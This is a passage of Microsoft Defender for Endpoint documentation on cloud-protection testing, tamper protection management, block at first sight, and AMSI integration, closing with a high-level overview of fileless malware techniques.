menu, click Run as administrator and click Yes at the permissions prompt. This
command will only work on Windows 10, version 1703 or higher, or Windows 11.
For more information, see Manage Microsoft Defender Antivirus with the mpcmdrun.exe
commandline tool.
Attempt to download a fake malware file from Microsoft

You can download a sample file that Microsoft Defender Antivirus will detect and block
if you're properly connected to the cloud. Visit https://aka.ms/ioavtest1 to download
the file.
７ Note
The downloaded file is not exactly malware. It's a fake file designed to test if you're
properly connected to the cloud.
If you're properly connected, you'll see a warning Microsoft Defender Antivirus

notification.
If you're using Microsoft Edge, you'll also see a notification message:


A similar message occurs if you're using Internet Explorer:


View the fake malware detection in your Windows Security app

1. On your task bar, select the Shield icon, open the Windows Security app. Or,
search the Start for Security.
2. Select Virus & threat protection, and then select Protection history.
3. c. Under the Quarantined threats section, select See full history to see the
detected fake malware.
７ Note
Versions of Windows 10 before version 1703 have a different user interface.

See Microsoft Defender Antivirus in the Windows Security app.
The Windows event log will also show Windows Defender client event ID 1116.
 Tip
See also
Configure device proxy and Internet connectivity settings for Microsoft Defender
for Endpoint
Use Group Policy settings to configure and manage Microsoft Defender Antivirus
Important changes to Microsoft Active Protection Services endpoint
 Tip
Feedback

Protect security settings with tamper
protection
Article • 02/13/2024
Applies to:

Platforms
Windows
macOS
What is tamper protection?

Tamper protection is a capability in Microsoft Defender for Endpoint that helps protect
certain security settings, such as virus and threat protection, from being disabled or
changed. During some kinds of cyber attacks, bad actors try to disable security features
on devices. Disabling security features provides bad actors with easier access to your
data, the ability to install malware, and the ability to exploit your data, identity, and
devices. Tamper protection helps guard against these types of activities.
Tamper protection is part of anti-tampering capabilities that include standard protection

attack surface reduction rules. Tamper protection is an important part of built-in
protection.
What happens when tamper protection is

turned on?
When tamper protection is turned on, these tamper-protected settings can't be
changed:
Virus and threat protection remains enabled.

Real-time protection remains turned on.
Behavior monitoring remains turned on.
Antivirus protection, including IOfficeAntivirus (IOAV) remains enabled.
Cloud protection remains enabled.
Security intelligence updates occur.
Automatic actions are taken on detected threats.
Notifications are visible in the Windows Security app on Windows devices.
Archived files are scanned.
Exclusions cannot be modified or added
As of signature release 1.383.1159.0 , due to confusion around the default value for "Allow
Scanning Network Files", tamper protection no longer locks this setting to its default value.
In managed environments, the default value is enabled .
） Important
When tamper protection is turned on, tamper-protected settings cannot be

changed. To avoid breaking management experiences, including Intune and
Configuration Manager, keep in mind that changes made to tamper-protected
settings might appear to succeed but are actually blocked by tamper protection.
Depending on your particular scenario, you have several options available:
If you must make changes to a device and those changes are blocked by
tamper protection, you can use troubleshooting mode to temporarily disable
tamper protection on the device.
You can use Intune or Configuration Manager to exclude devices from tamper
protection.
Tamper protection doesn't prevent you from viewing your security settings. And, tamper
protection doesn't affect how non-Microsoft antivirus apps register with the Windows
Security app. If your organization is using Defender for Endpoint, individual users can't
change the tamper protection setting; in those cases, your security team manages
tamper protection. For more information, see How do I configure or manage tamper
protection?
On what devices can tamper protection be

enabled?
Tamper protection is available for devices that are running one of the following versions
of Windows:
Windows 10 and 11 (including Enterprise multi-session)

Windows Server 2022, Windows Server 2019, and Windows Server, version 1803 or
later
Windows Server 2016 and Windows Server 2012 R2 (using the modern, unified
solution)
Tamper protection is also available for Mac, although it works a little differently than on
Windows. For more information, see Protect macOS security settings with tamper
protection.
 Tip
Built-in protection includes turning tamper protection on by default. For more

information, see:
Built-in protection helps guard against ransomware (article)

Tamper protection will be turned on for all enterprise customers (Tech
Community blog post)
Tamper protection on Windows Server 2012 R2, 2016, or

Windows version 1709, 1803, or 1809
If you're using Windows Server 2012 R2 using the modern unified solution, Windows
Server 2016, Windows 10 version 1709, 1803, or 1809, you don't see Tamper Protection
in the Windows Security app. Instead, you can use PowerShell to determine whether
tamper protection is enabled.
） Important
On Windows Server 2016, the Settings app doesn't accurately reflect the status of
real-time protection when tamper protection is enabled.
Use PowerShell to determine whether tamper protection

and real-time protection are turned on
1. Open the Windows PowerShell app.
2. Use the Get-MpComputerStatus PowerShell cmdlet.
3. In the list of results, look for IsTamperProtected or RealTimeProtectionEnabled . (A

value of true means tamper protection is enabled.)
How do I configure or manage tamper
protection?
You can use Microsoft Intune and other methods to configure or manage tamper
protection, as listed in the following table:
ﾉ Expand table
Method What you can do
Use the Microsoft Turn tamper protection on (or off), tenant wide. See Manage tamper
Defender portal . protection for your organization using Microsoft Defender XDR.
This method doesn't override settings that are managed in Microsoft

Intune or Configuration Manager.
Use the Microsoft Intune Turn tamper protection on (or off), tenant wide, or apply tamper
admin center or protection to some users/devices. You can exclude certain devices
Configuration Manager. from tamper protection. See Manage tamper protection for your
organization using Intune.
Protect Microsoft Defender Antivirus exclusions from tampering if

you're using Intune only or Configuration Manager only. See Tamper
protection for antivirus exclusions.
Use Configuration Turn tamper protection on (or off), tenant wide, or apply tamper
Manager with tenant protection to some users/devices. You can exclude certain devices
attach. from tamper protection. See Manage tamper protection for your
organization using tenant attach with Configuration Manager, version
2006.
Use the Windows Turn tamper protection on (or off) on an individual device that isn't
Security app. managed by a security team (such as devices for home use). See
Manage tamper protection on an individual device.
This method doesn't override tamper protection settings that are set in
the Microsoft Defender portal, Intune, or Configuration Manager, and it
isn't intended to be used by organizations.
 Tip
If you're using Group Policy to manage Microsoft Defender Antivirus settings, keep
in mind that any changes made to tamper-protected settings are ignored. If you
must make changes to a device and those changes are blocked by tamper
protection, use troubleshooting mode to temporarily disable tamper protection on
the device. After troubleshooting mode ends, any changes made to tamper-
Protect Microsoft Defender Antivirus exclusions

Under certain conditions, tamper protection can protect exclusions that are defined for
Microsoft Defender Antivirus. For more information, see Tamper protection for
exclusions.
View information about tampering attempts

Tampering attempts typically indicate that a larger cyberattack has taken place. Bad
actors try to change security settings as a way to persist and stay undetected. If you're
part of your organization's security team, you can view information about such
attempts, and then take appropriate actions to mitigate threats.
Whenever a tampering attempt is detected, an alert is raised in the Microsoft Defender

portal (https://security.microsoft.com ).
Using endpoint detection and response and advanced hunting capabilities in Microsoft
Defender for Endpoint, your security operations team can investigate and address such
attempts.
Review your security recommendations

Tamper protection integrates with Microsoft Defender Vulnerability Management
capabilities. Security recommendations include making sure tamper protection is turned
on. For example, in your Vulnerability Management dashboard, you can search on
tamper. In the results, you can select Turn on Tamper Protection to learn more and turn
it on.
To learn more about Microsoft Defender Vulnerability Management, see Dashboard

insights - Defender Vulnerability Management.
See also
Built-in protection helps guard against ransomware
Frequently asked questions on tamper protection
Troubleshoot problems with tamper protection
Defender for Endpoint on non-Windows devices
 Tip
Feedback

Manage tamper protection for your
organization using Microsoft Defender
portal
Article • 11/15/2023
Applies to:

Platforms
Windows
Tamper protection helps protect certain security settings, such as virus and threat
protection, from being disabled or changed. If you're part of your organization's security
team, you can turn tamper protection on (or off) tenant wide by using the Microsoft
Defender portal (https://security.microsoft.com ).
） Important
If tamper protection is deployed and managed through Intune, turning tamper

protection on or off in the Microsoft Defender portal won't impact the state of
tamper protection. It restricts tamper-protected settings to their secure default
values. For more information, see What happens when tamper protection is
turned on?
Requirements for managing tamper protection

in the Microsoft Defender portal
You must have appropriate permissions assigned through roles, such as Global
Administrator or Security Administrator. (See Microsoft Defender XDR role-based
access control (RBAC).)
Devices must be running certain versions of Windows or macOS. (See On what

devices can tamper protection be enabled?)
Devices must be onboarded to Microsoft Defender for Endpoint.
Devices must be using anti-malware platform version 4.18.2010.7 (or above) and
anti-malware engine version 1.1.17600.5 (or above). (Manage Microsoft Defender
Antivirus updates and apply baselines.)
Cloud-delivered protection must be turned on.
７ Note
When tamper protection is enabled via the Microsoft Defender portal, cloud-
delivered protection is required so that the enabled state of tamper protection can
be controlled. Starting with the November 2021 update (platform version
4.18.2111.5 ), if cloud-delivered protection is not already turned on for a device,
when tamper protection is turned on, cloud-delivered protection is turned on

automatically on the device.
Turn tamper protection on (or off) in the

2. Choose Settings > Endpoints.
3. Go to General > Advanced features, and then turn tamper protection on.
Important points to keep in mind
Currently, the option to manage tamper protection in the Microsoft Defender
portal is on by default for new deployments, as part of built-in protection, which
helps guard against ransomware. For existing deployments, tamper protection is
available on an opt-in basis. To opt in, in the Microsoft Defender portal , choose
Settings > Endpoints > Advanced features > Tamper protection.
When you enable tamper protection in the Microsoft Defender portal, the setting
is applied tenant wide and restricts tamper-protected settings to their secure
defaults. Any changes made to tamper-protected settings are ignored. Depending
on your particular scenario, you have several options available:
If you must make changes to a device and those changes are blocked by tamper
protection, you can use troubleshooting mode to temporarily disable tamper
protection on the device.
protection.
If you're managing tamper protection through Intune and certain other

conditions are met, you can manage tamper-protected antivirus exclusions.
See also
Built-in protection helps guard against ransomware
What happens when tamper protection is turned on?
 Tip
Feedback

Manage tamper protection for your
organization using Microsoft Intune
Article • 10/27/2023
Applies to:

Platforms
Windows
team, and you're using Microsoft Intune, you can manage tamper protection for your
organization in the Intune admin center . Or, you can use Configuration Manager. With
Intune or Configuration Manager, you can:
Turn tamper protection on (or off) for some or all devices.

Protect Microsoft Defender Antivirus exclusions from tampering (certain
requirements must be met).
） Important
If you're using Microsoft Intune to manage Defender for Endpoint settings, make
sure to set DisableLocalAdminMerge to true on devices.

changed. To avoid breaking management experiences, including Intune (and
Configuration Manager), keep in mind that changes to tamper-protected settings
might appear to succeed but are actually blocked by tamper protection. Depending
tamper protection, we recommend using troubleshooting mode to
temporarily disable tamper protection on the device. Note that after
troubleshooting mode ends, any changes made to tamper-protected settings
are reverted to their configured state.
You can use Intune or Configuration Manager to exclude devices from
tamper protection.
If you're managing tamper protection through Intune, you can change
tamper-protected antivirus exclusions.
Requirements for managing tamper protection

in Intune
ﾉ Expand table
Requirement Details
Roles and You must have appropriate permissions assigned through roles, such as Global
permissions Administrator or Security Administrator. See Microsoft Entra roles with Intune
access.
Device Your organization uses Intune to manage devices.

management
Intune licenses Intune licenses are required. See Microsoft Intune licensing.
Operating Windows devices must be running Windows 10 version 1709 or later or

System Windows 11. (For more information about releases, see Windows release
information.)
For Mac, see Protect macOS security settings with tamper protection.
Security You must be using Windows security with security intelligence updated to
intelligence version 1.287.60.0 (or later).
Antimalware Devices must be using antimalware platform version 4.18.1906.3 (or above)
platform and anti-malware engine version 1.1.15500.X (or later). See Manage Microsoft
Defender Antivirus updates and apply baselines.
Microsoft Entra Your Intune and Defender for Endpoint tenants must share the same Microsoft
ID Entra infrastructure.
Defender for Your devices must be onboarded to Defender for Endpoint.

Endpoint
７ Note
If devices are not enrolled in Microsoft Defender for Endpoint, tamper protection
shows up as Not Applicable until the onboarding process completes. Tamper
protection can prevent changes to security settings from occurring. If you see an
error code with Event ID 5013, see Review event logs and error codes to
troubleshoot issues with Microsoft Defender Antivirus.
Turn tamper protection on (or off) in Microsoft

Intune
1. In the Intune admin center , go to Endpoint security > Antivirus, and then
choose + Create Policy.
In the Profile list, select Windows Security experience.
2. Create a profile that includes the following setting:
TamperProtection (Device): On
3. Finish selecting options and settings for your policy.
4. Deploy the policy to devices.
Tamper protection for antivirus exclusions

If your organization has exclusions defined for Microsoft Defender Antivirus, tamper
protection protects those exclusions, provided all of the following conditions are met:
ﾉ Expand table
Condition Criteria
Microsoft Defender Devices are running Microsoft Defender platform 4.18.2211.5 or

platform later. For more information, see Monthly platform and engine
versions.
DisableLocalAdminMerge This setting is also known as preventing local list merging.

setting DisableLocalAdminMerge is enabled so that settings configured on a
device aren't merged with organization policies, such as settings in
Intune. For more information, see DisableLocalAdminMerge.
Device management Devices are either managed in Intune only, or are managed with
Configuration Manager only. Sense must be enabled.
Antivirus exclusions Microsoft Defender Antivirus exclusions are managed in Microsoft

Intune. For more information, see Settings for Microsoft Defender
Antivirus policy in Microsoft Intune for Windows devices.
Functionality to protect Microsoft Defender Antivirus exclusions is

enabled on devices. For more information, see How to determine
whether antivirus exclusions are tamper protected on a Windows
device.
 Tip
For more detailed information about Microsoft Defender Antivirus exclusions, see
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender
Antivirus.
How to determine whether antivirus exclusions

are tamper protected on a Windows device
You can use a registry key to determine whether the functionality to protect Microsoft
Defender Antivirus exclusions is enabled. The following procedure describes how to
view, but not change, tamper protection status.
1. On a Windows device open Registry Editor. (Read-only mode is fine; you're not
editing the registry key.)
2. To confirm that the device is managed by Intune only or managed by

Configuration Manager only, with Sense enabled, check the following registry key
values:
ManagedDefenderProductType (located at
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender or
HKLM\SOFTWARE\Microsoft\Windows Defender )
EnrollmentStatus (located at
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SenseCM or
HKLM\SOFTWARE\Microsoft\SenseCM )
The following table summarizes what the registry key values mean:
ﾉ Expand table
ManagedDefenderProductType EnrollmentStatus What the value means

value value
6 (any value) The device is managed by Intune

only.
(Meets a requirement for exclusions
to be tamper protected.)
7 4 The device is managed by

(Meets a requirement for exclusions
to be tamper protected.)
A value other than 6 or 7 (any value) The device isn't managed by Intune
only or Configuration Manager
only.
(Exclusions aren't tamper protected.)
3. To confirm that tamper protection is deployed and that exclusions are tamper
protected, check the TPExclusions registry key (located at
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features or
HKLM\SOFTWARE\Microsoft\Windows Defender\Features ).
ﾉ Expand table
TPExclusions What the value means
1 The required conditions are met, and the new functionality to protect
exclusions is enabled on the device.
(Exclusions are tamper protected.)
0 Tamper protection isn't currently protecting exclusions on the device.

(If all the requirements are met and this state seems incorrect, contact
support.)
Ｕ Caution
Do not change the value of the registry keys. Use the preceding procedure for
information only. Changing keys has no effect on whether tamper protection
applies to exclusions.
See also
Frequently asked questions (FAQs) on tamper protection
 Tip
Feedback

Manage tamper protection using tenant
attach with Configuration Manager,
version 2006
Article • 10/27/2023
Applies to:

Platforms
Windows
team, and you're using version 2006 of Configuration Manager, you can manage tamper
protection for devices by using a method called tenant attach. Tenant attach enables
you to sync your on-premises-only Configuration Manager devices into the Intune
admin center, and then deliver endpoint security configuration policies to on-premises
collections & devices.
Using Configuration Manager with tenant attach, you can turn tamper protection on (or
off) for some or all devices.
） Important

changed. To avoid breaking management experiences, including Intune and
Configuration Manager, keep in mind that changes to tamper-protected settings
might appear to succeed but are actually blocked by tamper protection. Depending
tamper protection, use troubleshooting mode to temporarily disable tamper
protection on the device.
Use Intune or Configuration Manager to exclude devices from tamper
protection.
1. Set up tenant attach. To learn more, see Get started: Create and deploy endpoint
security policies from the admin center.
2. In the Intune admin center , go to Endpoint security > Antivirus, and then
choose + Create Policy.
In the Platform list, select Windows 10, Windows 11, and Windows Server
(ConfigMgr).
In the Profile list, select Windows Security experience (preview).
3. On the Configuration settings step, under Windows Security, set Enable tamper
protection to prevent Microsoft Defender from being disabled to Enabled.
4. Finish selecting options and settings for your policy.
5. Deploy the policy to your devices.
See also
Frequently asked questions (FAQs) on tamper protection
Tech Community Blog: Announcing Tamper Protection for Configuration Manager
Tenant Attach clients
 Tip
Feedback

Manage tamper protection on an
individual device
Article • 10/27/2023
Applies to:
Platforms
Windows
protection, from being disabled or changed.
If you're a home user, or you aren't subject to settings managed by a security team, you
can use the Windows Security app to manage tamper protection on an individual
Windows device. You must have appropriate admin permissions on your device to do
change security settings, such as tamper protection.
1. On a Windows device, select Start, and start typing Security. In the search results,
select Windows Security.
2. Select Virus & threat protection > Virus & threat protection settings.
3. Set Tamper Protection to On or Off.
Here's what you see in the Windows Security app:


７ Note
Tamper protection blocks attempts to modify Microsoft Defender Antivirus settings

through the registry.
To help ensure that tamper protection doesn't interfere with non-Microsoft security
products or enterprise installation scripts that modify these settings, go to
Windows Security and update Security intelligence to version 1.287.60.0 or later.
(See Security intelligence updates .)
After you've made this update, tamper protection continues to protect your registry
settings, and logs attempts to modify them without returning errors.
See also
Protect security settings with tamper protection
 Tip
Feedback

Frequently asked questions (FAQs)
about tamper protection
FAQ
Applies to:

Platforms
Windows
What are the device requirements for

tamper protection to reach devices
when tamper protection is enabled in
the Microsoft Defender portal?
Devices must meet all of the following requirements:
Devices must be running certain versions of Windows or macOS. (See On what

devices can tamper protection be enabled?)
Devices must be onboarded to Microsoft Defender for Endpoint.
Devices must be using anti-malware platform version 4.18.2010.7 (or later) and
anti-malware engine version 1.1.17600.5 (or later). (Manage Microsoft Defender
Antivirus updates and apply baselines.)
Cloud-delivered protection must be turned on.
To manage tamper protection in the Microsoft Defender portal

(https://security.microsoft.com ), you must have appropriate permissions assigned
through roles, such as Global Administrator or Security Administrator. (See Microsoft
Defender XDR role-based access control (RBAC).)
On which versions of Windows can I
configure tamper protection?
Windows 11
Windows 11 Enterprise multi-session
Windows 10 OS 1709, 1803, 1809, or later together with Microsoft Defender for
Endpoint.
Windows 10 Enterprise multi-session
If you're using Configuration Manager, version 2006, with tenant attach, tamper
protection can be extended to Windows Server 2012 R2, Windows Server 2016,
Windows Server 2019, and Windows Server 2022. See Tenant attach: Create and deploy
endpoint security Antivirus policy from the admin center (preview).
Does tamper protection affect non-

Microsoft Antivirus registration in the
Windows Security app?
No. Non-Microsoft Antivirus offerings continue to register with the Windows Security
application.
What happens if Microsoft Defender

Antivirus isn't active on a device?
If non-Microsoft antivirus/antimalware software is installed on a device, when that
device is onboarded to Microsoft Defender for Endpoint, Microsoft Defender Antivirus
runs in passive mode by default. Tamper protection protects the service and its features.
If/when non-Microsoft antivirus/antimalware software is uninstalled, Microsoft Defender

Antivirus switches to active mode automatically. Tamper protection continues to protect
the service and its features.
How do I turn tamper protection on or

off?
We recommend using Microsoft Intune to manage Microsoft Defender Antivirus settings
for your organization. With Intune, you can control where tamper protection is enabled
(or disabled) through policies. You can also protect Microsoft Defender Antivirus
exclusions. See Tamper protection: Microsoft Defender Antivirus exclusions.
You can also use the Microsoft Defender portal or Configuration Manager.
If you're a home user, see Manage tamper protection on an individual device.
Tamper protection is part of built-in protection, and should be enabled.
Does tamper protection apply to

exclusions?
New functionality is rolling out now to protect Microsoft Defender Antivirus exclusions
on devices. Certain conditions must be met. For example, you must use Intune only or
Configuration Manager only to manage devices, and you must have Sense enabled. See
Protect Microsoft Defender Antivirus exclusions.
How does configuring tamper

protection in Intune affect how I
manage Microsoft Defender Antivirus
with Group Policy?
If you're currently using Intune to configure and manage tamper protection, you should
continue using Intune. When tamper protection is turned on and you use Group Policy
to make changes to Microsoft Defender Antivirus settings, any settings that are
protected by tamper protection are ignored.
protection, you can use troubleshooting mode to temporarily disable tamper
protection on the device. After troubleshooting mode ends, any changes made to
tamper-protected settings are reverted to their configured state.
protection.
If you're managing tamper protection through Intune and certain other conditions
are met, you can manage tamper-protected antivirus exclusions.
If we use Microsoft Intune to configure
tamper protection, does it apply only to
the entire organization?
If you're using Intune to configure and manage tamper protection, you don't necessarily
have to apply tamper protection to your entire organization. With Intune, you can
choose to apply tamper protection to your entire organization, or you can select specific
devices or user groups to receive tamper protection. You can also exclude specific
devices from tamper protection.
What settings can't be changed when

tamper protection is turned on?
When tamper protection is turned on, the following security settings are protected from
being changed:
Virus and threat protection remains enabled.

Real-time protection remains turned on.
Behavior monitoring remains turned on.
Antivirus protection, including IOfficeAntivirus (IOAV) remains enabled.
Cloud protection remains enabled.
Security intelligence updates continue to occur.
Automatic actions are taken on detected threats.
Notifications are visible in the Windows Security app on Windows devices.
Archived files are scanned.
For more information, see What happens when tamper protection is turned on?
If tamper protection is turned on in

Microsoft Defender XDR, can settings in
Intune or Configuration Manager
override it?
When tamper protection is turned on in the Microsoft Defender portal
(https://security.microsoft.com ), tamper protection is turned on, tenant wide.
However, policies defined in Intune or Configuration Manager can override settings in
the Microsoft Defender portal. For example, you can define a policy in Intune or
Configuration Manager that excludes certain devices from tamper protection.
How do I deploy
DisableLocalAdminMerge?
Use Intune to deploy DisableLocalAdminMerge.
How can I confirm whether exclusions

are tamper protected on a Windows
device?
Follow the guidance in Manage tamper-protected antivirus exclusions.
If tamper protection is turned on for

exclusions, do I need to disable it to
apply new exclusions policy settings
from Intune or Configuration Manager?
No. When tamper protection for exclusions is enabled, you do not need to disable it to
apply new exclusions.
Can I configure tamper protection with

Configuration Manager?
Yes. Similar to using Intune, you can apply tamper protection to your whole
organization, or to specific users and devices. For more information, see the following
resources:
Manage tamper protection using Intune

Manage tamper protection using tenant attach with Configuration Manager,
version 2006
Tech Community blog: Announcing Tamper Protection for Configuration Manager
Tenant Attach clients
I'm an enterprise customer. Can local
admins change tamper protection on
their devices?
In general, tamper protection helps protect against users being able to change security
settings directly on devices. Tamper protection is part of anti-tampering capabilities that
include standard protection attack surface reduction rules. To further prevent malware
from running in kernel, consider using driver block rules with Application Control for
Windows.
What happens if my device is

onboarded with Microsoft Defender for
Endpoint and then goes into an off-
boarded state?
If a device is off-boarded from Microsoft Defender for Endpoint, tamper protection is
turned on, which is the default state for unmanaged devices.
If the status of tamper protection

changes, are alerts shown in the
Microsoft Defender portal?
Alerts should be listed in the Microsoft Defender portal under Alerts.
Your security operations team can also use hunting queries, such as the following
example:
AlertInfo|where Title == "Tamper Protection bypass"
What are all the options for configuring

the tamper protection?
You can use any of the following methods to configure tamper protection:
The Microsoft Defender portal (turn tamper protection on or off, tenant wide)
Intune (turn tamper protection on or off, and/or configure tamper protection for
some or all users)
Configuration Manager (with tenant attach, you can configure tamper protection
for some or all devices by using the Windows Security experience profile).
Windows Security app (for an individual device used at home or in situations
where a security team doesn't manage your device)
７ Note
We recommend keeping tamper protection turned on for your whole organization.

If tamper protection prevents your IT or security team from performing a necessary
task on a device, consider using troubleshooting mode instead of disabling tamper
protection.
Feedback

Turn on block at first sight
Article • 02/16/2024
Applies to:

Platforms
Windows
This article describes an antivirus/antimalware feature known as "block at first sight",

and describes how to enable block at first sight for your organization.
 Tip
This article is intended for enterprise admins and IT Pros who manage security
settings for organizations. If you are not an enterprise admin or IT Pro but you have
questions about block at first sight, see the Not an enterprise admin or IT Pro?
section.
What is "block at first sight"?

Block at first sight is a threat protection feature of next-generation protection that
detects new malware and blocks it within seconds. Block at first sight is enabled when
certain security settings are enabled:
Cloud protection is turned on;

Sample submission is configured for samples to be sent automatically; and
Microsoft Defender Antivirus is up to date on devices.
In most enterprise organizations, the settings needed to enable block at first sight are
configured with Microsoft Defender Antivirus deployments. See Turn on cloud
protection in Microsoft Defender Antivirus.
How it works
When Microsoft Defender Antivirus encounters a suspicious but undetected file, it
queries our cloud protection backend. The cloud backend applies heuristics, machine
learning, and automated analysis of the file to determine whether the files are malicious
or not a threat.
Microsoft Defender Antivirus uses multiple detection and prevention technologies to

deliver accurate, intelligent, and real-time protection.
 Tip
To learn more, see (Blog) Get to know the advanced technologies at the core of
Microsoft Defender for Endpoint next-generation protection .
A few things to know about block at first sight

Block at first sight can block non-portable executable files (such as JS, VBS, or
macros) and executable files, running the latest Defender antimalware platform on
Windows or Windows Server.
Block at first sight only uses the cloud protection backend for executable files and
non-portable executable files that are downloaded from the Internet, or that
originate from the Internet zone. A hash value of the .exe file is checked via the
cloud backend to determine if the file is a previously undetected file.
If the cloud backend is unable to make a determination, Microsoft Defender

Antivirus locks the file and uploads a copy to the cloud. The cloud performs more
analysis to reach a determination before it either allows the file to run or blocks it
in all future encounters, depending on whether it determines the file to be
malicious or not a threat.
In many cases, this process can reduce the response time for new malware from
hours to seconds.
You can specify how long a file should be prevented from running while the cloud-
based protection service analyzes the file. And, you can customize the message
displayed on users' desktops when a file is blocked. You can change the company
name, contact information, and message URL.
Turn on block at first sight with Microsoft

Intune
1. In the Microsoft Intune admin center (https://endpoint.microsoft.com ), go to
Endpoint security > Antivirus.
2. Select an existing policy, or create a new policy using the Microsoft Defender
Antivirus profile type. In our example, we selected Windows 10, Windows 11, or
Windows Server for the platform.
3. Set Allow cloud protection to Allowed. Turns on Cloud Protection.

4. Scroll down to Submit Samples Consent, and select one of the following settings:
Send all samples automatically

Send safe samples automatically
5. Apply the Microsoft Defender Antivirus profile to a group, such as All users, All
devices, or All users and devices.
Turn on block at first sight with Group Policy
７ Note
We recommend using Intune or Microsoft Configuration Manager to turn on block

at first sight.
2. Using the Group Policy Management Editor go to Computer configuration >

Administrative templates > Windows Components > Microsoft Defender
Antivirus > MAPS.
3. In the MAPS section, double-click Configure the 'Block at First Sight' feature, and
set it to Enabled, and then select OK.
） Important
Setting to Always prompt (0) will lower the protection state of the device.
Setting to Never send (2) means block at first sight will not function.
4. In the MAPS section, double-click Send file samples when further analysis is
required, and set it to Enabled. Under Send file samples when further analysis is
required, select Send all samples, and then select OK.
5. Redeploy your Group Policy Object across your network as you usually do.
Confirm block at first sight is enabled on

individual client devices
You can confirm that block at first sight is enabled on individual client devices using the
Windows Security app. Block at first sight is automatically enabled as long as Cloud-
delivered protection and Automatic sample submission are both turned on.
1. Open the Windows Security app.
2. Select Virus & threat protection, and then, under Virus & threat protection
settings, select Manage Settings.
3. Confirm that Cloud-delivered protection and Automatic sample submission are

both turned on.
７ Note
If the prerequisite settings are configured and deployed using Group Policy,
the settings described in this section will be greyed-out and unavailable for
use on individual endpoints.
Changes made through a Group Policy Object must first be deployed to
individual endpoints before the setting will be updated in Windows Settings.
Turn off block at first sight
Ｕ Caution
Turning off block at first sight will lower the protection state of your device(s) and
your network. We do not recommend disabling block at first sight protection
permanently.
Turn off block at first sight with Microsoft Intune

sign in.
2. Go to Endpoint security > Antivirus, and then select your Microsoft Defender
Antivirus policy.
3. Under Manage, choose Properties.
4. Next to Configuration settings, choose Edit.
5. Set Allow cloud protection to Not allowed. Turns off Cloud Protection.
6. Review and save your settings.
Turn off block at first sight with Group Policy

Console, right-click the Group Policy Object you want to configure, and then select
Edit.
2. Using the Group Policy Management Editor go to Computer configuration and

3. Expand the tree through Windows components > Microsoft Defender Antivirus >
MAPS.
4. Double-click Configure the 'Block at First Sight' feature and set the option to
Disabled.
７ Note
Disabling block at first sight does not disable or alter the prerequisite group
policies.
Not an enterprise admin or IT Pro?

If you are not an enterprise admin or an IT Pro, but you have questions about block at
first sight, this section is for you. Block at first sight is a threat protection feature that
detects and blocks malware within seconds. Although there isn't a specific setting called
"Block at first sight," the feature is enabled when certain settings are configured on your
device.
How to manage block at first sight on or off on your own

device
If you have a personal device that is not managed by an organization, you might be
wondering how to turn block at first sight on or off. You can use the Windows Security
app to manage block at first sight.
1. On your Windows 10 or Windows 11 computer, open the Windows Security app.
3. Under Virus & threat protection settings, select Manage settings.
4. Take one of the following steps:
To enable block at first sight, make sure that both Cloud-delivered

protection and Automatic sample submission are both turned on.
To disable block at first sight, turn off Cloud-delivered protection or

Automatic sample submission.
Ｕ Caution
Turning off block at first sight lowers the level of protection for your
device. We do not recommend permanently disabling block at first sight.
See also
Stay protected with Windows Security
 Tip
Feedback

Anti-malware Scan Interface (AMSI)
integration with Microsoft Defender
Antivirus
Article • 02/27/2024
） AI-assisted content. This article was partially created with the help of AI. An author reviewed and
revised the content as needed. Learn more
Applies to:

Microsoft Defender for Endpoint P1 & P2
Platforms
Windows 10 and newer

Windows Server 2016 and newer
Microsoft Defender for Endpoint utilizes the anti-malware Scan Interface (AMSI) to
enhance protection against fileless malware, dynamic script-based attacks, and other
nontraditional cyber threats. This article describes the benefits of AMSI integration, the
types of scripting languages it supports, and how to enable AMSI for improved security.
What is Fileless malware?

Fileless malware plays a critical role in modern cyberattacks, using stealthy techniques to
avoid detection. Several major ransomware outbreaks used fileless methods as part of
their kill chains.
Fileless malware uses existing tools that are already present on a compromised device,
such as PowerShell.exe or wmic.exe. Malware can infiltrate a process, executing code
within its memory space, and invoking these built-in tools. Attackers significantly reduce
their footprint and evade traditional detection mechanisms.
Because memory is volatile, and fileless malware doesn't place files on disk, establishing
persistence by using fileless malware can be tricky. One example of how fileless malware
achieved persistence was to create a registry run key that launches a “one-liner”
PowerShell cmdlet. This command launched an obfuscated PowerShell script that was
stored in the registry BLOB. The obfuscated PowerShell script contained a reflective
portable executable (PE) loader that loaded a Base64-encoded PE from the registry. The
script stored in the registry ensured the malware persisted.
Attackers use several fileless techniques that can make malware implants stealthy and
evasive. These techniques include:
Reflective DLL injection Reflective DLL injection involves the manual loading of
malicious DLLs into a process’ memory without the need for said DLLs to be on
disk. The malicious DLL can be hosted on a remote attacker-controlled machine
and delivered through a staged network channel (for example, Transport Layer
Security (TLS) protocol), or embedded in obfuscated form inside infection vectors
like macros and scripts. This results in the evasion of the OS mechanism that
monitors and keeps track of loading executable modules. An example of malware
that uses Reflective DLL injection is HackTool:Win32/Mikatz!dha.
Memory exploits Adversaries use fileless memory exploits to run arbitrary code
remotely on victim machines. For example, the UIWIX threat uses the EternalBlue
exploit, which was used by both Petya and WannaCry, to install the DoublePulsar
backdoor, which lives entirely in the kernel’s memory (SMB Dispatch Table). Unlike
Petya and Wannacry, UIWIX doesn't drop any files on disk.
Script-based techniques Scripting languages provide powerful means for

delivering memory-only executable payloads. Script files can embed encoded shell
codes or binaries that they can decrypt on the fly at run time and execute via .NET
objects or directly with APIs without requiring them to be written to disk. The
scripts themselves can be hidden in the registry, read from network streams, or run
manually in the command-line by an attacker, without ever touching the disk.
７ Note
Do not disable PowerShell as a means to block fileless malware. PowerShell is a

powerful and secure management tool and is important for many system and IT
functions. Attackers use malicious PowerShell scripts as post-exploitation technique
that can only take place after an initial compromise has already occurred. Its misuse
is a symptom of an attack that begins with other malicious actions like software
exploitation, social engineering, or credential theft. The key is to prevent an
attacker from getting into the position where they can misuse PowerShell.
WMI persistence Some attackers use the Windows Management Instrumentation

(WMI) repository to store malicious scripts that are then invoked periodically using
WMI bindings.
Microsoft Defender Antivirus blocks most malware using generic, heuristic, and
behavior-based detections, as well as local and cloud-based machine learning models.
Microsoft Defender Antivirus protects against fileless malware through these
capabilities:
Detecting script-based techniques by using AMSI, which provides the capability to

inspect PowerShell and other script types, even with multiple layers of obfuscation
Detecting and remediating WMI persistence techniques by scanning the WMI
repository, both periodically and whenever anomalous behavior is observed
